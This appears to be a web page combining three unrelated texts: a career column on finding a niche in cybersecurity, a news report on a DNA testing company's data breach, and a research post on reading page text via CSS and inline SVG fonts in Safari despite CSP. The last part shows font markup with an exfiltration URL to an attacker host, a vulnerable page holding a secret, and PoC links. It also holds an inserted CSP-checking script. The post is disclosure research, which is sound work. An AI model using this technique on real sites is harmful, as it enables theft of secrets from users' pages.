Finding Your Niche in Cybersecurity

Despite a lack of exposure to issues in computer security during my undergraduate education, I now work as a senior threat researcher tracking advanced persistent threats as they relate to nation-state actors and cybercriminal organizations. I reverse-engineer mobile malware and analyze the infrastructure these threat actors use to both distribute and communicate with malicious applications. (For example, last month my team identified a new rooting malware, AbstractEmu, that was distributed on Google Play and prominent third-party stores, most likely for malicious financial gain.)

I love my job and I love having a hand in stopping the bad guys, but I took the scenic route to get here.

I started programming when I was 9 and began exploring the possibility of studying computer science while I was in high school. I was advised to avoid computer science as it was an impractical, theoretical degree that would never land me a job. As a result, I entered university as an English and political science major and planned to study international law. During my first year, I enrolled in a computer science class as an elective, and our class attended a lecture from a recent graduate who spoke of how useful her degree had been in her role as a video game developer. Inspired, I transferred to the computer science department the following semester.

It wasn’t until five years after I graduated that I found my way to cybersecurity, however. To become a better software engineer, I enrolled in a security certification program and met a wonderful mentor who was working on a security engineering team at the time. He encouraged me to apply for an open position on his team and helped kick-start my career in cybersecurity.

All too often, the best things in life happen serendipitously, like my career in cybersecurity. Despite our interests in high school or even university, most people don’t land their dream job immediately after they graduate; some may not even realize their dream jobs exist! In an informal Instagram poll of approximately 500 participants, 52% responded that they transitioned into cybersecurity either from another area of tech or an entirely unrelated industry.

How Do You Find Your Niche?
One of the biggest challenges with transitioning to a new role in cybersecurity is figuring out the area of security you’re most interested in. Traditionally, roles have been broken down into two main “teams”: red and blue. Red teams typically handle offensive security, “attacking” the corporation with pen testing or social engineering to find vulnerabilities. Blue teams are responsible for defensive security, which includes incident response, digital forensics, and threat intelligence. Recently, new team names have been created to represent overlaps in roles (for example, “purple” teams that handle both offensive and defensive security duties). You can further explore the cybersecurity “colour wheel” and what these roles entail through summaries online, like Hackernoon’s breakdown.

One of the best ways to narrow down the exhaustive list of possibilities of a career in cyber is to explore the finer details of these roles through online job listings. Ask yourself questions such as “Does this look exciting and interesting to me?” or “Can I see myself working on this problem for a prolonged period of time?” or even “Would I enjoy the pressure or expectations set by this role?” 

For example, in some roles, like incident response, you may be required to be “on call” and available to handle issues that arise — day or night — for a set time on a recurring schedule. If you’re someone who struggles in high-pressure environments and can’t see yourself performing well in that situation, then a role with those expectations may not be a great fit. 

I often advise those interested in multiple areas of cybersecurity to participate in a “capture the flag” (CTF) event. These are available online (for example, https://ctftime.org) or in person at security conferences. Participants compete in teams, or individually, to solve challenges that span multiple areas of cybersecurity: network security, pen testing, reverse engineering, and social engineering, among others. This is a great way to gain exposure to other areas of cybersecurity with which you may not be familiar, and most of the challenges are real-world examples of problems you might face in a role within that area of cybersecurity. It was at a CTF event where I discovered my love for reverse engineering!

The cybersecurity industry offers so many opportunities for curious, eager problem solvers. Most importantly, it’s a career path that will only continue to become more valued in the years to come. With a little patience and research, you can find your niche in this exciting industry and discover a role you love that also protects those around you.

First of two parts. The second part of this column will cover diversity in security.

DNA testing firm discloses data breach affecting 2.1 million people

DNA Diagnostics Center (DDC), an Ohio-based DNA testing company, has disclosed a hacking incident that affects 2,102,436 persons.

The incident resulted in a confirmed data breach that occurred between May 24, 2021, and July 28, 2021, and the firm concluded its internal investigation on October 29, 2021.

The information that the hackers accessed includes the following:

  • Full names
  • Credit card number + CVV
  • Debit card number + CVV
  • Financial account number
  • Platform account password

The compromised database contained older backups dating between 2004 and 2012, and it’s not linked to the active systems and databases used by DDC today.

“The impacted database was associated with a national genetic testing organization that DDC has never used in its operations and has not been active since 2012,” reads the notice.

“DDC acquired certain assets from this national genetic testing organization in 2012 that included certain personal information, and therefore, impacts from this incident are not associated with DDC.”

DDC is working with external cyber-security experts to regain possession of the stolen files and ensure that the threat actor won’t propagate them further. So far, there have been no reports of fraud or improper use of the stolen details.

The affected individuals will receive a notification letter and instructions on enrolling for one year of free credit monitoring and identity theft protection services through Experian.

The recipients of these notices are advised to remain vigilant against fraud and to monitor their bank account statements frequently so that suspicious activity can be identified and reported immediately.

DDC underlines that no genetic testing data has been exposed due to the data breach incident, as this is stored in a different system.

The company offers paternity, DNA relationship, fertility, COVID-19, ancestry, and immigration-related testing, so it holds very sensitive data.

According to the notice though, nothing relevant to these services has been compromised.

We have reached out to DDC to request more details about the nature and impact of the hacking incident, and we will update this piece as soon as we have a response.

Data Exfiltration via CSS + SVG Font

This post shows that SVG fonts and CSS can be used to read a page’s text contents.

There are several known ways to read the page’s text contents with CSS. The known techniques are well covered in the following article by Juan Manuel Fernández:

CSS Injection Primitives :: DoomsDay Vault

These techniques can be useful to attackers in some situations, for example when the input is sanitized and only limited HTML tags can be used, or when JavaScript cannot be used because of Content Security Policy (CSP) restrictions.

The technique I want to introduce today is one such technique. The basic idea is the same as the following font ligature trick by Michał Bentkowski.

Stealing Data in Great style – How to Use CSS to Attack Web Application. – research.securitum.com

It is mostly the same, but I have never seen an article mention it, and I think it is worth describing because the technique explained here can be used in specific situations where Michał’s technique is blocked by the CSP.

Well, in my Japanese blog post, around here, I explained Michał’s trick in detail in my own words, but since you can read English, please read his article first 🙂

Okay, you’ve read it, right? As you learned from his article, he used WOFF fonts converted from SVG fonts. In my trick, I use SVG fonts without converting them. Michał said “browsers have stopped supporting the SVG format in fonts (hence the need to use the WOFF format)”, but in fact Safari still supports it. After all, the trick I am about to introduce is just his trick with the WOFF font replaced by an SVG font. Still, the reason I want to introduce it is that SVG fonts can be used even when loading fonts is blocked by the CSP. That is, SVG fonts allow reading text contents even on pages where the CSP prohibits loading fonts. This is because SVG fonts can not only be loaded from URLs, like WOFF fonts, but all of a font’s components can also be defined inline without loading anything from a URL.

Let’s see how Michał’s trick can be replaced.

In his trick, the WOFF font is loaded via <style>’s @font-face.

<style>
@font-face {
    font-family: "hack";
    src: url(http://192.168.13.37:3001/font/%22/0)
}
[…]
</style>

This style can be replaced with the following inline SVG.

<svg>
<defs>
<font horiz-adv-x="0">
<font-face font-family="hack" units-per-em="1000"></font-face>
<glyph unicode="&quot;0" horiz-adv-x="99999" d="M1 0z"></glyph>
<glyph unicode="1" horiz-adv-x="0" d="M1 0z"></glyph>
<glyph unicode="2" horiz-adv-x="0" d="M1 0z"></glyph>
<glyph unicode="3" horiz-adv-x="0" d="M1 0z"></glyph>
<glyph unicode="4" horiz-adv-x="0" d="M1 0z"></glyph>
<glyph unicode="5" horiz-adv-x="0" d="M1 0z"></glyph>
[…]
</font>
</defs>
</svg>

Now, if the font-family property is set to “hack” via CSS, the SVG font is applied to the target’s text even outside the SVG. This is not blocked by CSP even if font-src ‘none’ is set. (Note that, to observe the leaked data, this trick uses a background image request just as Michał’s trick does, so at minimum the host that observes the request must be allowed by the img-src directive.)
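As an added example (not part of the original post or its PoC repository), here is a small checker that applies the reasoning above to a CSP header: it resolves the default-src fallback, reports whether inline styles and an img-src leak channel are allowed, and shows that font-src ‘none’ is irrelevant because the inline font is never fetched. It assumes the attacker already has an HTML injection point; the hardened header and the sanitizer check are constructed here for illustration.

```python
import re

# Fetch directives that fall back to default-src when not set explicitly.
FALLBACK_TO_DEFAULT = {"font-src", "img-src", "style-src"}
# Source expressions that never let the page reach an attacker-observable host.
NON_EXFIL_SOURCES = {"'none'", "'self'", "data:", "blob:"}
# The header of the vulnerable page discussed in the post, and a hardened variant (constructed here).
VULNERABLE_CSP = "default-src 'none';script-src 'nonce-random';style-src 'unsafe-inline';img-src https:"
HARDENED_CSP = "default-src 'none'; script-src 'nonce-random'; style-src 'nonce-random'; img-src 'self'"

def parse_csp(header):
    """Parse a CSP header into {directive: [source expressions]}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy

def effective_sources(policy, directive):
    """Source list that actually governs a directive, applying the default-src fallback."""
    if directive in policy:
        return policy[directive]
    return policy.get("default-src", []) if directive in FALLBACK_TO_DEFAULT else []

def has_exfil_channel(sources):
    """True if any source admits a host outside the page's origin (https:, *, third-party hosts)."""
    return any(s.lower() not in NON_EXFIL_SOURCES
               and not s.startswith("'nonce-") and not s.startswith("'sha")
               for s in sources)

def contains_inline_svg_font(markup):
    """Flag SVG font elements a sanitizer that keeps <svg> must strip (legacy HTML <font> too)."""
    return re.search(r"<\s*(font|font-face|glyph|missing-glyph)\b", markup, re.I) is not None

def assess_svg_font_exfil(header):
    """Does this CSP leave the inline SVG font leak open, given an HTML injection point?"""
    policy = parse_csp(header)
    style_injectable = any(s.lower() == "'unsafe-inline'" for s in effective_sources(policy, "style-src"))
    leak_channel = has_exfil_channel(effective_sources(policy, "img-src"))
    return {
        "inline_styles_allowed": style_injectable,
        "img_src_leak_channel": leak_channel,
        # Reported only to show it is irrelevant: the inline font is never fetched.
        "font_src_blocks_fonts": effective_sources(policy, "font-src") == ["'none'"],
        "svg_font_exfil_possible": style_injectable and leak_channel,
    }
```

Run against VULNERABLE_CSP the checker reports the leak as possible even though font-src resolves to ‘none’; against HARDENED_CSP (nonce-based style-src and img-src ‘self’) it does not.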

I’ll show you the PoC. Suppose there is a vulnerable page like the following:

https://vulnerabledoma.in/svg_font/xss.html?xss=%3Cs%3EXSS%3Cscript%3Ealert(1)%3C/script%3E

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="Content-Security-Policy" content="default-src 'none';script-src 'nonce-random';style-src 'unsafe-inline';img-src https:">
</head>
<body>
<script id="leakme" nonce="random">
const secret = "573ba8e9bfd0abd3d69d8395db582a9e";
</script>

<script nonce="random">
const params = (new URL(document.location)).searchParams;
const xss = params.get('xss');
if(xss){
    document.write(xss);
}
</script>
</body>
</html>

I’ll show that SVG fonts can leak the “secret” variable.

You can reproduce it by opening the following URL with Safari and clicking the “Go” button. 

PoC: https://l0.cm/svg_font/poc.php

All the code can be found at: https://github.com/masatokinugawa/css-exfiltration-svg-font

If the PoC works correctly, multiple new windows will open and, after waiting for a while, the secret variable’s string will be displayed little by little, like “573b …”, on the page with the “Go” button, as in the following video.

It’s almost the same as Michał’s PoC, except that it uses SVG fonts, but there are a few changes. In his PoC, he loads the target page into an iframe, but in my PoC I used window.open() instead. This is because Safari now blocks all third-party cookies by default, and I thought an attack using an iframe would not be a realistic PoC for Safari. I also changed the way the data is passed. Again because of third-party cookie blocking, the cookie cannot be set when the background image is loaded, so I used a session id in a URL parameter instead.

By the way, if you’re used to Chrome, you might wonder why multiple new windows are opened by one click. This is because Safari has a popup blocker, but there is no limit to the number of windows that can be opened by one click. Thanks to this, it is possible to read the data efficiently using multiple windows.

That’s it. Thanks for reading! I hope this post helps you out.